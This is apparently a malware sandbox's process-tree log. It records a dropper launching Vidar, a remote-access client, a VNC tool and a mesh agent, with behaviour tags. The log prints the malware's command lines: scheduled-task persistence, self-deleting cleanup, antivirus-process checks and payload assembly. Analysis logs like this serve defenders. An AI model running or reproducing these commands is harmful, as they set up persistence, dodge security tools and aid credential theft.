C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x118,0x11c,0xd4,0x114,0x7ff71e0c5460,0x7ff71e0c5470,0x7ff71e0c54805⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4856 /prefetch:24⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\service.exe"C:\Users\Admin\AppData\Local\Temp\Files\service.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dccrypt.exe"C:\Users\Admin\AppData\Local\Temp\Files\dccrypt.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\serverperf\Rf9n8rAaQutOZQd6TFDgcQ0Y3BLG9XLXz1nDso2.vbe"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\serverperf\gc411KmXHpEBvwsmBcLMcGXH8jhoDdLsi9TAz2QKUXLoYkYDWV2rtqOl.bat" "5⤵
-
C:\serverperf\Portwebwin.exe"C:\serverperf/Portwebwin.exe"6⤵
- Executes dropped EXE
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe"C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 13284⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe"C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exeC:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Vidar.exe"C:\Users\Admin\AppData\Local\Temp\Files\Vidar.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe" & rd /s /q "C:\ProgramData\EHJJECBKKECF" & exit5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\uctgkfb7.exe"C:\Users\Admin\AppData\Local\Temp\Files\uctgkfb7.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\199076676.exeC:\Users\Admin\AppData\Local\Temp\199076676.exe4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe"C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Files\41m98slk.exe"C:\Users\Admin\AppData\Local\Temp\Files\41m98slk.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value5⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\.ses",start4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 4524⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uE5J9VOwpiD7.bat" "5⤵
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cCwKAlILb5YE.bat" "7⤵
-
C:\Windows\system32\chcp.comchcp 650018⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"8⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P54elIApyx88.bat" "9⤵
-
C:\Windows\system32\chcp.comchcp 6500110⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"10⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dTyBqYgekmxt.bat" "11⤵
-
C:\Windows\system32\chcp.comchcp 6500112⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"12⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U6US1qZt8nRt.bat" "13⤵
-
C:\Windows\system32\chcp.comchcp 6500114⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"14⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bPaz7gfpi3f0.bat" "15⤵
-
C:\Windows\system32\chcp.comchcp 6500116⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"16⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IBagvzpBzBR8.bat" "17⤵
-
C:\Windows\system32\chcp.comchcp 6500118⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"18⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\x2jTimIfMEar.bat" "19⤵
-
C:\Windows\system32\chcp.comchcp 6500120⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"20⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\g0a0NDuiCLmN.bat" "21⤵
-
C:\Windows\system32\chcp.comchcp 6500122⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"22⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vpQnmARWIAcW.bat" "23⤵
-
C:\Windows\system32\chcp.comchcp 6500124⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"24⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9wynFDOlUCBj.bat" "25⤵
-
C:\Windows\system32\chcp.comchcp 6500126⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"26⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ntLopB9xi2Ek.bat" "27⤵
-
C:\Windows\system32\chcp.comchcp 6500128⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"28⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lnRk3D8rVLGt.bat" "29⤵
-
C:\Windows\system32\chcp.comchcp 6500130⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"30⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TZH76awo3lqG.bat" "31⤵
-
C:\Windows\system32\chcp.comchcp 6500132⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"32⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f33⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pafprqId3NAf.bat" "33⤵
-
C:\Windows\system32\chcp.comchcp 6500134⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"34⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f35⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UxTzb8XaVPBD.bat" "35⤵
-
C:\Windows\system32\chcp.comchcp 6500136⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"36⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f37⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xFix6A4oKNt8.bat" "37⤵
-
C:\Windows\system32\chcp.comchcp 6500138⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"38⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f39⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZVUWIw7x2WEk.bat" "39⤵
-
C:\Windows\system32\chcp.comchcp 6500140⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"40⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f41⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4itZw8IkpNiX.bat" "41⤵
-
C:\Windows\system32\chcp.comchcp 6500142⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"42⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f43⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IFdInoHftUqa.bat" "43⤵
-
C:\Windows\system32\chcp.comchcp 6500144⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"44⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" /rl HIGHEST /f45⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp2.exe"C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp2.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 4804⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall4⤵
- Sets service image path in registry
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MJPVgHw.exe"C:\Users\Admin\AppData\Local\Temp\Files\MJPVgHw.exe"3⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵
- Adds Run key to start application
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵
- Adds Run key to start application
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\3.exe"C:\Users\Admin\AppData\Local\Temp\Files\3.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"3⤵
- Checks processor information in registry
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2295365⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "ReprintVerificationMercyRepository" Elliott5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Exhibit + Rand + Hours 229536\U5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\229536\Webster.pif229536\Webster.pif 229536\U5⤵
- Checks computer location settings
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\229536\Webster.pif" & rd /s /q "C:\ProgramData\EBFBFBFIIJDA" & exit6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- Delays execution with timeout.exe
-
-
-
-
